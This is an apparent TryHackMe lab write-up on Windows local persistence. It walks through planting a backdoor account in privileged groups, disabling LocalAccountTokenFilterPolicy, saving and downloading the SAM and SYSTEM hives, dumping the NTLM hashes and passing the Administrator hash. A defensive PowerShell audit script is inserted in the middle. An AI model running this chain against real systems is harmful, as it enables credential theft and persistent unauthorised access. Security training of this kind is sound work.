THM - Red Team - Windows Local Persistence

Published 2023-04-07 18:34:30 Author: Jungle-zt

Tampering with Unprivileged Accounts

Assigning Group Memberships

C:\> net localgroup administrators thmuser0 /add

This will allow you to access the server using RDP, WinRM or any other remote administration service that is available.

If this looks too suspicious, you can use the Backup Operators group instead. Users in this group have no administrative privileges, but they are allowed to read and write any file or registry key on the system, ignoring any configured DACL. This lets us copy the contents of the SAM and SYSTEM registry hives, which we can then use to recover the password hashes of every user, making it easy to escalate to any administrative account.

To do this, we first add the account to the Backup Operators group:

C:\> net localgroup "Backup Operators" thmuser1 /add

Since this is an unprivileged account, it cannot RDP or WinRM back into the machine unless we add it to the Remote Desktop Users (RDP) or Remote Management Users (WinRM) group. We will use WinRM for this task:

C:\> net localgroup "Remote Management Users" thmuser1 /add

If you now try to connect from your attacker machine, you will be surprised to find that even though you are a member of the Backup Operators group, you cannot access all files as expected. A quick check of our assigned groups shows that we are part of Backup Operators, but the group is disabled:

user@AttackBox$ evil-winrm -i MACHINE_IP -u thmuser1 -p Password321

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators               Alias            S-1-5-32-551 Group used for deny only
BUILTIN\Remote Management Users        Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

This is due to User Account Control (UAC). One of the features UAC implements, LocalAccountTokenFilterPolicy, strips the administrative privileges from any local account when it logs in remotely. While you can elevate your privileges through UAC from a graphical user session (read more about UAC here), if you are using WinRM you are confined to a limited access token without administrative privileges.

To regain administrative privileges for your user, we must disable LocalAccountTokenFilterPolicy by setting the following registry value to 1:

C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
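The two changes described above (adding an account to a privileged local group and setting LocalAccountTokenFilterPolicy to 1) are exactly what a defender should be looking for on a host. The following PowerShell audit script is an added example written for this page; it is not part of the original room or of any tool mentioned here. It compares the members of the groups named on this page against a constructed baseline (the `$ExpectedMembers` table is a placeholder you replace with your own) and reports the registry value the page modifies. It assumes a Windows 10 / Server 2016 or later host, where `Get-LocalGroupMember` is available from the built-in Microsoft.PowerShell.LocalAccounts module, and local administrator rights to read the group membership.

```powershell
# Added audit example: flags the indicators from the persistence technique above.
# Assumes: Windows 10 / Server 2016+, run as a local administrator.
# $ExpectedMembers is a constructed baseline placeholder; adjust it to your environment.

$ExpectedMembers = @{
    'Administrators'          = @("$env:COMPUTERNAME\Administrator")
    'Backup Operators'        = @()
    'Remote Management Users' = @()
    'Remote Desktop Users'    = @()
}

function Get-UnexpectedGroupMembers {
    param([hashtable]$Baseline)
    $findings = @()
    foreach ($group in $Baseline.Keys) {
        # Members are reported as COMPUTER\Name (local) or DOMAIN\Name.
        $members = Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue
        foreach ($m in $members) {
            if ($Baseline[$group] -notcontains $m.Name) {
                $findings += [pscustomobject]@{
                    Check  = "Unexpected member of '$group'"
                    Detail = "$($m.Name) ($($m.PrincipalSource), SID $($m.SID))"
                }
            }
        }
    }
    return $findings
}

function Test-TokenFilterPolicy {
    # Same path and value name as the reg add command on this page.
    # A value of 1 means remote logons by local accounts keep a full admin token.
    $path  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $value = (Get-ItemProperty -Path $path -Name LocalAccountTokenFilterPolicy `
                  -ErrorAction SilentlyContinue).LocalAccountTokenFilterPolicy
    if ($value -eq 1) {
        # Emit a finding only when the weakening setting is present.
        [pscustomobject]@{
            Check  = 'LocalAccountTokenFilterPolicy'
            Detail = 'Set to 1 (UAC remote token filtering disabled); expected absent or 0'
        }
    }
}

# Functions that emit nothing produce an empty array here, so the sum is just the findings.
$results = @(Get-UnexpectedGroupMembers -Baseline $ExpectedMembers) + @(Test-TokenFilterPolicy)

if ($results.Count -eq 0) {
    Write-Output 'No persistence indicators found.'
} else {
    $results | Format-Table -AutoSize
}
```

Run it periodically or from a configuration-management job and treat any output as something to investigate, not to auto-remediate: a Backup Operators member may be a legitimate backup service account, so the baseline is what turns this from noise into a detection. For real-time coverage, the same two changes also generate Security log events on a host with the default audit policy (a member added to a security-enabled local group is event 4732), while the registry change is only logged if a SACL is set on the Policies\System key.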

Once all of this is set up, we can use our backdoor user. First, let's establish a WinRM connection and check that the Backup Operators group is now enabled for our user:

user@AttackBox$ evil-winrm -i MACHINE_IP -u thmuser1 -p Password321

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators             Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users      Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                 Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

We then proceed to back up the SAM and SYSTEM hives and download them to our attacker machine:

*Evil-WinRM* PS C:\> reg save hklm\system system.bak
    The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\sam sam.bak
    The operation completed successfully.

*Evil-WinRM* PS C:\> download system.bak
    Info: Download successful!

*Evil-WinRM* PS C:\> download sam.bak
    Info: Download successful!

Note: If Evil-WinRM takes too long to download the files, feel free to use any other transfer method, for example smbserver.py.

With these files, we can dump the password hashes of all users using secretsdump.py or another similar tool:

user@AttackBox$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x41325422ca00e6552bb6508215d8b426
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1cea1d7e8899f69e89088c4cb4bbdaa3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9657e898170eb98b25861ef9cafe5bd6:::
thmuser1:1011:aad3b435b51404eeaad3b435b51404ee:e41fd391af74400faa4ff75868c93cce:::
[*] Cleaning up...

Finally, we use the Administrator's hash to connect to the victim machine:

user@AttackBox$ evil-winrm -i MACHINE_IP -u Administrator -H 1cea1d7e8899f69e89088c4cb4bbdaa3